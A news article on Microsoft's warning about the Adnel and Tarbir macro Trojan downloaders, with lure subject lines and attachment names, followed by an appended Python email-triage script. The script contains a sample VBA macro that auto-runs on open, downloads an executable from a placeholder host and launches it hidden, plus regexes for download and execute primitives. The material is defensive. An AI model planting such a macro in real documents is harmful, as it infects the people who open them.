Microsoft warns of new malware attacks with Office documents

Microsoft warns of increase in Adnel and Tarbir Trojan attacks on Excel and Word users

Microsoft has warned Microsoft Office users of a significant rise in malware attacks that use macros in Excel and Word documents. In a report published on its blog, Microsoft says there has been more than a threefold jump in malware campaigns spreading two different Trojan downloaders. These Trojan downloaders arrive in emails masquerading as orders or invoices.

According to Microsoft, the malware is being spread through spam emails carrying the following subject lines:

  • ACH Transaction Report
  • DOC-file for report is ready
  • Invoice as requested
  • Invoice – P97291
  • Order – Y24383
  • Payment Details
  • Remittance Advice from Engineering Solutions Ltd
  • Your Automated Clearing House Transaction Has Been Put On

The attachments carrying the Adnel and Tarbir downloaders usually have file names like the following:

  • 20140918_122519.doc
  • 813536MY.xls
  • ACH Transfer 0084.doc
  • Automated Clearing House transfer 4995.doc
  • BAC474047MZ.xls
  • BILLING DETAILS 4905.doc
  • CAR014 151239.doc
  • ID_2542Z.xls
  • Fuel bill.doc
  • ORDER DETAILS 9650.doc
  • Payment Advice 593016.doc
  • SHIPPING DETAILS 1181.doc
  • SHIP INVOICE 1677.doc
  • SHIPPING NO.doc

The Microsoft TechNet blog says that the two Trojan downloaders, TrojanDownloader:W97M/Adnel and TrojanDownloader:O97M/Tarbir, are being spread at a rapid pace through spam emails and phishing campaigns. Worryingly, they are targeting both home PC users and enterprise customers, and most of the victims are based in the United States and the United Kingdom.

[Figure: Adnel and Tarbir telemetry]

Because Office blocks macro execution by default, the trojan authors add a notice to the document claiming that its contents can only be viewed with macros enabled. When the victim opens the malicious Word document or Excel sheet, Office shows its standard security warning that macros have been disabled, but some users simply disregard this message and enable the macros, which runs the trojan downloader and infects their PC.

“The combination of the instructional document, spam email with supposed monetary content, and a seemingly relevant file name, can be enough to convince an unsuspecting user to click the Enable Content button”, according to Alden Pornasdoro of the Microsoft Malware Protection Center.

Once the Trojan downloader is running, it fetches and installs other, more damaging malware on the infected system. Microsoft notes that the vast majority of genuine invoices and orders do not require macros, so a user who receives such a document should be wary of enabling them.
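The lure lists above and the enable-macros-then-download chain described in the last paragraphs lend themselves to a simple mail-gateway triage rule. The following is an added example, not code from Microsoft or from this article: it parses an inbound message with Python's standard library, matches the subject and attachment name against the reported lures, checks that a .doc/.xls attachment is really an OLE2 container, and flags VBA that combines an auto-run entry point with download and execute primitives. The e-mail fixture, the VBA listing, the example.invalid addresses and the regular expressions are constructed for this example; extracting the VBA from a real attachment (for instance with oletools' olevba) is assumed to happen before the text is passed in.

```python
"""Mail-gateway triage for macro lures of the Adnel/Tarbir kind.

Added example (not code from the Microsoft blog post or this article).
Standard library only. The e-mail fixture and the VBA listing below are
constructed samples; in practice the VBA would be extracted from the
attachment with a tool such as oletools' olevba before being passed in.
"""
import email
import re
from email import policy
from email.message import EmailMessage

# Magic bytes of the OLE2 compound file container used by legacy .doc/.xls.
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# Lure subjects and attachment names reported for the campaign, plus
# patterns that generalise the numbered variants ("Invoice - P97291",
# "ORDER DETAILS 9650.doc", ...). The fixed set is illustrative, not complete.
LURE_SUBJECTS = {
    "ACH Transaction Report", "DOC-file for report is ready",
    "Invoice as requested", "Payment Details",
}
LURE_SUBJECT_RE = re.compile(r"^(Invoice|Order)\s*[-–]\s*[A-Z]\d{5}$", re.I)
LURE_ATTACHMENT_RE = re.compile(
    r"^(ACH Transfer|Automated Clearing House transfer|BILLING DETAILS|"
    r"ORDER DETAILS|Payment Advice|SHIPPING DETAILS|SHIP INVOICE|CAR\d{3})"
    r"\s+\d+\.(doc|xls)$", re.I)

# VBA entry points that run as soon as the document is opened, and the
# download / execute primitives a downloader needs.
AUTOEXEC_RE = re.compile(r"\b(AutoOpen|Document_Open|Auto_Open|Workbook_Open)\b", re.I)
DOWNLOAD_RE = re.compile(r"\b(URLDownloadToFile|XMLHTTP|WinHttpRequest|ADODB\.Stream)\b", re.I)
EXEC_RE = re.compile(r"\b(Shell|WScript\.Shell|CreateObject|ShellExecute)\b", re.I)


def scan_vba(source: str) -> dict:
    """Flag VBA that runs automatically on open AND fetches and launches something."""
    autoexec = sorted(set(AUTOEXEC_RE.findall(source)))
    download = sorted(set(DOWNLOAD_RE.findall(source)))
    execute = sorted(set(EXEC_RE.findall(source)))
    return {"autoexec": autoexec, "download": download, "execute": execute,
            "downloader": bool(autoexec and download and execute)}


def triage_email(raw: bytes, vba_by_attachment: dict) -> dict:
    """Score one inbound message; vba_by_attachment maps filename -> VBA source."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    subject = str(msg["subject"] or "").strip()
    lure_subject = subject in LURE_SUBJECTS or bool(LURE_SUBJECT_RE.match(subject))
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if not name.lower().endswith((".doc", ".xls")):
            continue
        data = part.get_payload(decode=True) or b""
        findings.append({
            "filename": name,
            "lure_name": bool(LURE_ATTACHMENT_RE.match(name)),
            "ole2": data.startswith(OLE2_MAGIC),   # legacy binary Office container?
            **scan_vba(vba_by_attachment.get(name, "")),
        })
    if any(f["downloader"] for f in findings):
        verdict = "quarantine"      # auto-run macro with download + execute
    elif lure_subject or any(f["lure_name"] for f in findings):
        verdict = "suspicious"      # lure text only; hold for analyst review
    else:
        verdict = "clean"
    return {"subject": subject, "lure_subject": lure_subject,
            "attachments": findings, "verdict": verdict}


# Constructed VBA in the shape of such a downloader (addresses are placeholders).
SAMPLE_VBA = """\
Sub AutoOpen()
    Dim http As Object
    Set http = CreateObject("Microsoft.XMLHTTP")
    http.Open "GET", "http://example.invalid/inv.exe", False
    http.Send
    ' ... body written to %TEMP%\\inv.exe via ADODB.Stream ...
    Shell Environ("TEMP") & "\\inv.exe", vbHide
End Sub
"""


def build_sample_email() -> bytes:
    """Constructed lure: campaign-style subject and attachment name, stub OLE2 body."""
    msg = EmailMessage()
    msg["From"] = "accounts@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Order - Y24383"
    msg.set_content("Please find the order details attached.")
    msg.add_attachment(OLE2_MAGIC + b"\0" * 504, maintype="application",
                       subtype="msword", filename="ORDER DETAILS 9650.doc")
    return msg.as_bytes()


if __name__ == "__main__":
    result = triage_email(build_sample_email(),
                          {"ORDER DETAILS 9650.doc": SAMPLE_VBA})
    print(result["verdict"], result["attachments"][0])
```

A hit on lure text alone is only "suspicious", because the subjects and file names are generic business phrases that legitimate mail also uses; quarantine is reserved for an attachment whose macro actually runs on open and both fetches and launches a payload. Real campaigns rename lures and obfuscate VBA, so treat the patterns as a starting point rather than a signature set.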
